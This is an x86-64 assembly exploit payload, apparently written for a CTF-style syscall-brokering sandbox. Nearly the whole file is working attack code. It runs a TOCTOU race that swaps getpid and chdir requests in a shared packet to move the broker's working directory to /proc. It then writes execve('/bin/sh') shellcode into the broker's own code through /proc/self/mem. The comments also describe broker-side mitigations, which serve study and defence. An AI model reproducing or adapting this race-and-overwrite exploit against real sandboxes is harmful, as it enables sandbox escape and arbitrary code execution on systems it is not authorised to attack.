/*
 * GAS / AT&T syntax, x86-64 Linux, C-preprocessed (.S): NUM_* come from #define.
 *
 * Stand-alone payload aimed at a syscall-brokering sandbox whose broker is NOT on
 * this page: strings are copied into a shared mapping (copy_str_to_shared_map) and
 * requests are issued through request_syscall; both are trampolines to fixed
 * addresses in the host binary.  Every absolute address below (0x6031xx data,
 * 0x4010xx / 0x401639 code) is hard-coded, so this presumably relies on a non-PIE
 * host image with no ASLR applied to it.
 *
 * Flow: check -> (race_loop until the check passes) -> good -> getshell.
 * race_loop is a TOCTOU against the broker: the request packet is rewritten in
 * the shared mapping between two notifications.  Broker-side mitigation: copy
 * the packet out of shared memory once, then validate and execute the copy;
 * never re-read shared fields after validation.  A burst of alternating
 * getpid/chdir requests (NUM_ITERS pairs) is also a detectable pattern.
 *
 * Register roles (callee-saved, so they survive the calls into host code):
 *   r12 = iterations left, r13 = "/proc" in shared map, r14 = "/p" in shared map,
 *   r15 = request packet.  Packet layout is inferred from the stores below
 *   (syscall nr at +0, first argument at +8) -- confirm against the broker.
 */
.global _start

#define NUM_SYSCALLS 0x1
#define NUM_ITERS 0x400

_start:
    jmp check

/* pump: write(fd @0x603148, rsp - NUM_SYSCALLS, NUM_SYSCALLS)
 * Sends NUM_SYSCALLS bytes of whatever sits just below rsp (red zone, not
 * initialised here) to the notification fd; presumably the byte value is
 * irrelevant and only the write itself wakes the broker.
 * Clobbers rax, rcx, rdx, rsi, rdi, r11 (syscall clobbers rcx/r11). */
pump:
    mov $NUM_SYSCALLS, %rdx             # count
    mov (0x603148), %rdi                # fd, loaded from a fixed host address
    lea -NUM_SYSCALLS(%rsp), %rsi       # buf = just below rsp
    mov $1, %eax                        # SYS_write
    syscall
    ret

/* start_over: (re)build the race inputs in the shared mapping and run
 * NUM_ITERS attempts.  Reached from check when the previous attempt failed. */
start_over:
    lea real_filename(%rip), %rdi
    call copy_str_to_shared_map
    mov %rax, %r13                      # r13 = "/proc" in shared map
    lea fake_filename(%rip), %rdi
    call copy_str_to_shared_map
    mov %rax, %r14                      # r14 = "/p" in shared map
    mov (0x603158), %r15                # r15 = request packet (fixed host address)
    mov $NUM_ITERS, %r12                # r12 = attempts remaining

/* race_loop: two requests per iteration.  The packet is modified between the
 * two pumps (nr and arg1 swapped), which is the TOCTOU window against a
 * broker that reads the shared packet more than once.  The trailing read
 * presumably waits for one reply byte per pump before the next iteration. */
race_loop:
    movl $0x27, (%r15)                  # nr = getpid
    mov %r13, 0x8(%r15)                 # arg1 = real_path ("/proc")
    call pump                           # notify broker (packet A)
    mov %r14, 0x8(%r15)                 # arg1 = fake_path ("/p")
    movl $0x50, (%r15)                  # nr = chdir
    call pump                           # notify broker (packet B)
    mov $(NUM_SYSCALLS*2), %rdx         # count = one byte per pump
    lea -(NUM_SYSCALLS*2)(%rsp), %rsi   # buf = just below rsp
    mov (0x603130), %rdi                # reply fd (fixed host address)
    mov $0, %eax                        # SYS_read
    syscall
    dec %r12
    jnz race_loop                       # falls through into check when exhausted

/* check: access("version", R_OK) through the broker.  The path is relative,
 * so it presumably only succeeds when the broker's cwd is /proc, i.e. when the
 * chdir in race_loop got through.  Nonzero result -> run the race again. */
check:
    lea test_filename(%rip), %rdi
    call copy_str_to_shared_map
    mov %rax, %rsi                      # arg1 = "version" in shared map
    mov $4, %rdx                        # arg2 = R_OK
    mov $21, %rdi                       # nr = access
    call request_syscall
    test %eax, %eax
    jnz start_over

/* good: write(1, "ok\n", 3) -- direct syscall, not via the broker. */
good:
    mov $3, %rdx                        # count
    lea ok(%rip), %rsi                  # buf
    mov $1, %rdi                        # fd = stdout
    mov $1, %eax                        # SYS_write
    syscall

/* getshell: open("self/mem", O_WRONLY) through the broker, then pwrite64 the
 * 0x40 bytes at `shellcode` to offset 0x401639 of that fd.  With the broker's
 * cwd at /proc this names the broker's own /proc/self/mem, so the write lands
 * in host code.  Mitigation: the broker must reject relative paths and any
 * request naming a proc mem file; W^X on the text pages alone does not stop
 * writes made through /proc/PID/mem.  request_syscall's result is not checked. */
getshell:
    lea self_maps(%rip), %rdi
    call copy_str_to_shared_map
    mov %rax, %rsi                      # arg1 = "self/mem" in shared map
    mov $1, %rdx                        # arg2 = O_WRONLY
    mov $2, %rdi                        # nr = open
    call request_syscall
    mov $18, %rdi                       # nr = pwrite64
    mov %rax, %rsi                      # arg1 = fd returned by open
    lea shellcode(%rip), %rdx           # arg2 = buf
    mov $0x40, %rcx                     # arg3 = count
    mov $0x401639, %r8                  # arg4 = file offset (host code address)
    call request_syscall

infloop:
    jmp infloop

/* shellcode: execve("/bin/sh", NULL, NULL).  Copied as raw bytes by getshell;
 * the rip-relative lea only resolves at the destination if `binsh` lies inside
 * the same 0x40-byte span, so the code/string layout here is significant. */
shellcode:
    xor %rdx, %rdx                      # envp = NULL
    xor %rsi, %rsi                      # argv = NULL
    lea binsh(%rip), %rdi               # path
    mov $0x3b, %eax                     # SYS_execve
    syscall
binsh:
    .string "/bin/sh"
real_filename:
    .string "/proc"
self_maps:
    .string "self/mem"
fake_filename:
    .string "/p"
test_filename:
    .string "version"
ok:
    .string "ok\n"

/* Trampolines into host code at fixed addresses (not on this page); argument
 * registers pass through untouched.  Presumed signatures from the call sites:
 *   copy_str_to_shared_map(rdi = src) -> rax = address of the copy in shared map
 *   request_syscall(rdi = nr, rsi, rdx, rcx, r8 = args) -> rax = result
 * Both use an indirect jmp, so the host must tolerate the caller's rsp/return
 * address as-is (tail call). */
copy_str_to_shared_map:
    mov $0x04010A0, %rax
    jmp *%rax

request_syscall:
    mov $0x4010C0, %rax
    jmp *%rax